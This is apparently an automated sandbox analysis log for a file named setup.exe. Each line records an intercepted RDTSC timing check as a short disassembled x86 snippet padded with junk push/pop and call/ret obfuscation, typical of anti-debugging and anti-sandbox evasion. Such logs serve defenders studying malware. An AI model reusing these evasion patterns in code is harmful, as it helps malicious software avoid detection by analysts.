Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387BC5 second address: 387BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387DF0 second address: 387DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387DF4 second address: 387DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3880B8 second address: 3880F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add edi, dword ptr [ebp+122D3A36h] 0x00000012 xchg eax, ebx 0x00000013 jmp 00007FDDE8CE13E5h 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3880F4 second address: 388112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 388112 second address: 388116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38B979 second address: 38B983 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38B983 second address: 38B987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38C509 second address: 38C559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnl 00007FDDE9067F66h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 push ebx 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 pop ebx 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FDDE9067F68h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 mov esi, dword ptr [ebp+122D2675h] 0x00000038 push 00000000h 0x0000003a stc 0x0000003b push 00000000h 0x0000003d or esi, 3196AD51h 0x00000043 xchg eax, ebx 0x00000044 push ecx 0x00000045 pushad 0x00000046 jnp 00007FDDE9067F66h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38C2B5 second address: 38C2BF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDDE8CE13DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38CCF5 second address: 38CCFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38D9A7 second address: 38D9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38D9AB second address: 38D9AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38D9AF second address: 38D9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov esi, 2385DD6Ah 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D1F62h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FDDE8CE13D8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov edi, 1024667Fh 0x00000038 push eax 0x00000039 jnp 00007FDDE8CE13E8h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38D9FD second address: 38DA01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38DA01 second address: 38DA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38E434 second address: 38E43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38E43A second address: 38E43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38E43F second address: 38E457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FDDE9067F66h 0x00000009 js 00007FDDE9067F66h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38E457 second address: 38E465 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDDE8CE13D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38EC17 second address: 38EC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3943A8 second address: 3943B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 popad 0x00000008 js 00007FDDE8CE13F2h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3943B9 second address: 3943CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FDDE9067F6Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 395756 second address: 3957BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 jng 00007FDDE8CE13F5h 0x0000000e call 00007FDDE8CE13DAh 0x00000013 jmp 00007FDDE8CE13E4h 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2A1Bh], esi 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FDDE8CE13D8h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov ebx, 344DA4D4h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 push edi 0x00000047 pop edi 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 394B3F second address: 394B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39590A second address: 395923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDDE8CE13E4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 396B84 second address: 396B9F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDDE9067F68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDDE9067F6Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 395923 second address: 395934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FDDE8CE13D6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 396B9F second address: 396BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3979E6 second address: 3979EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 397B60 second address: 397B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 399965 second address: 399984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDDE8CE13E7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 399984 second address: 3999A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDDE9067F77h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3999A5 second address: 3999AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3999AB second address: 3999AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 399B7E second address: 399B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39B895 second address: 39B8C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D2970h] 0x0000000f push 00000000h 0x00000011 mov di, 7D27h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDDE9067F70h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39C85E second address: 39C8E5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDDE8CE13DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FDDE8CE13D8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 add ebx, 28D4CC8Eh 0x0000002f call 00007FDDE8CE13E1h 0x00000034 mov bx, 54A2h 0x00000038 pop edi 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007FDDE8CE13D8h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000015h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 stc 0x00000056 mov edi, dword ptr [ebp+122D20E3h] 0x0000005c mov ebx, dword ptr [ebp+122D1877h] 0x00000062 push eax 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push esi 0x00000067 pop esi 0x00000068 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39C8E5 second address: 39C8EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39C8EF second address: 39C8F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39BAC1 second address: 39BADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE9067F79h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39EE93 second address: 39EF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDDE8CE13D6h 0x0000000a popad 0x0000000b nop 0x0000000c push edi 0x0000000d jo 00007FDDE8CE13D7h 0x00000013 cld 0x00000014 pop edi 0x00000015 mov bl, ah 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FDDE8CE13D8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 xor dword ptr [ebp+122D20A0h], eax 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007FDDE8CE13D8h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 or edi, 57FDAF37h 0x0000005b jmp 00007FDDE8CE13DBh 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jng 00007FDDE8CE13D6h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39EF11 second address: 39EF15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39EF15 second address: 39EF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39EF1B second address: 39EF25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FDDE9067F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39EF25 second address: 39EF4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007FDDE8CE13DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A0F9B second address: 3A0F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A1E27 second address: 3A1E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39F08A second address: 39F091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A1E2B second address: 3A1E31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A1ED6 second address: 3A1EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE9067F79h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A10BE second address: 3A111C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FDDE8CE13D8h 0x0000000c popad 0x0000000d nop 0x0000000e push edi 0x0000000f movsx ebx, dx 0x00000012 pop edi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a add edi, 1AF78C44h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov edi, dword ptr [ebp+122D385Eh] 0x0000002d mov eax, dword ptr [ebp+122D127Dh] 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FDDE8CE13D8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d cmc 0x0000004e push FFFFFFFFh 0x00000050 push eax 0x00000051 pushad 0x00000052 pushad 0x00000053 push eax 0x00000054 pop eax 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A111C second address: 3A1124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A2E68 second address: 3A2E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A2F0B second address: 3A2F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A312C second address: 3A3138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4DEB second address: 3A4DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3AD025 second address: 3AD029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3AD029 second address: 3AD075 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F77h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FDDE9067F8Bh 0x00000011 jmp 00007FDDE9067F79h 0x00000016 jmp 00007FDDE9067F6Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3AD075 second address: 3AD07B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3AD07B second address: 3AD085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3AD085 second address: 3AD089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3AD089 second address: 3AD0A5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDDE9067F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push ecx 0x0000000d jmp 00007FDDE9067F6Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3AD3A0 second address: 3AD3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B383A second address: 3B3841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B3841 second address: 3B3883 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDDE8CE13DCh 0x00000008 ja 00007FDDE8CE13D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 je 00007FDDE8CE13DEh 0x00000017 push esi 0x00000018 jbe 00007FDDE8CE13D6h 0x0000001e pop esi 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 ja 00007FDDE8CE13DEh 0x00000029 mov eax, dword ptr [eax] 0x0000002b push eax 0x0000002c push ebx 0x0000002d pushad 0x0000002e popad 0x0000002f pop ebx 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B3883 second address: 3B3887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B864B second address: 3B866F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FDDE8CE13E0h 0x0000000b popad 0x0000000c push ebx 0x0000000d jmp 00007FDDE8CE13DAh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B8059 second address: 3B806A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B806A second address: 3B8074 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDDE8CE13E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B8074 second address: 3B807A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B81F0 second address: 3B81F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B835C second address: 3B8378 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDDE9067F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDDE9067F72h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B8378 second address: 3B8383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FDDE8CE13D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B84B8 second address: 3B84F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDDE9067F73h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f jo 00007FDDE9067F66h 0x00000015 jl 00007FDDE9067F66h 0x0000001b pop esi 0x0000001c jo 00007FDDE9067F68h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B84F0 second address: 3B84F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B84F4 second address: 3B84F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BC758 second address: 3BC75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BC75C second address: 3BC78E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F75h 0x00000007 jmp 00007FDDE9067F74h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BC78E second address: 3BC7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDE8CE13DFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C1E38 second address: 3C1E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C1E3C second address: 3C1E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C1E42 second address: 3C1E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C10E8 second address: 3C10F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FDDE8CE13D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
